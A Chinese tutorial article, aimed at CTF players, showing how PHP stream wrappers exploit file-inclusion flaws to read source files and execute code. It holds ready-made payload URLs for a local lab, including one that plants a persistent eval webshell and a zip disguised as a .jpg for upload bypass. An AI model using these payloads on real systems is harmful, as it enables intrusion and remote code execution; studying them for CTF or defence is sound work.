您好,登錄后才能下訂單哦!
今天小編給大家分享一下怎么使用php偽協議實現命令執行的相關知識點,內容詳細,邏輯清晰,相信大部分人都還太了解這方面的知識,所以分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后有所收獲,下面我們一起來了解一下吧。
條件:
allow_url_fopen : off/on allow_url_include: off/on
作用:
用于訪問本地文件系統,在ctf中通常用來讀取本地文件
在include() / require() / include_once() / require_once()
參數可控的情況下,即使導入非.php文件,如shell.txt ,依然按照php語法進行解析,這是include()函數所決定的
說明:
file:// 文件系統是php使用的默認封裝協議,用于展示本地文件系統。
用法:
/path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:\path\to\winfile.ext \\smbserver\share\path\to\winfile.ext file:///path/to/file.ext
示例:
1.file://[文件的絕對路徑和文件名]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
2.file://[文件的相對路徑和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
3.http://網絡位置和文件名
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
條件:
allow_url_open : off/on allow_url_include: 僅 php://input php://stdin php://memory php://temp 需要on
作用:
php:// 訪問各個輸入/輸出流 (I/O streams), 在ctf中經常使用的是 php://filter 和 php://input
php://filter 用于讀取源碼 php://input 用于執行php代碼
說明:
php提供了一些雜項輸入/輸出(IO)流,允許訪問 PHP 的輸入輸出流,標準輸入輸出流和錯誤描述符:
php://filter使用:
php://filter/read=convert.base64-encode/resource=[文件名]
php://input的使用:
http://127.0.0.1/include.php?file=php://input
[POST DATA部分] <?php phpinfo(); ?>
寫入一句話
http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
作用:
php>=5.2.0 , 可以使用data://數據流封裝器,以傳遞相應格式的數據。通常用來執行php代碼
用法:
data://text/plain, ???
如:
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
作用:
zip:// & bzip:// & zlib:// 均屬于壓縮流,可以訪問壓縮文件中的子文件,更重要的是不需要指定后綴名,可以修改為任意后綴名,如 jpg,png,gif,xxx等
示例:
1.zip://[壓縮文件絕對路徑]%23[壓縮文件內的子文件文件名](# 的編碼為 %23)
壓縮 phpinfo.txt 為phpinfo.zip ,壓縮包重命名為 phpinfo.jpg ,并上傳
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
2.compress.bzip2://file.bz2
壓縮phpinfo.txt 為phpinfo.bz2 并上傳(同樣支持任意后綴名)
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
3.compress.zlib://file.gz
壓縮phpinfo.txt 為phpinfo.gz 并上傳(支持任意后綴名)
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
在ctf中常用的有data:// , php://input , php://filter ,file://
php://input ,data://用來執行命令 1.php://input 的用法 http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?> 2.data://用法 http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?> php://filter,file://用來讀取文件 3.php://filter用法 http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(讀取php文件需要先加密以下才能讀出來) http://127.0.0.1/include.php?file=php://filter/resource=/flag 4.file://用法 http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
以上就是“怎么使用php偽協議實現命令執行”這篇文章的所有內容,感謝各位的閱讀!相信大家閱讀完這篇文章都有很大的收獲,小編每天都會為大家更新不同的知識,如果還想學習更多的知識,請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。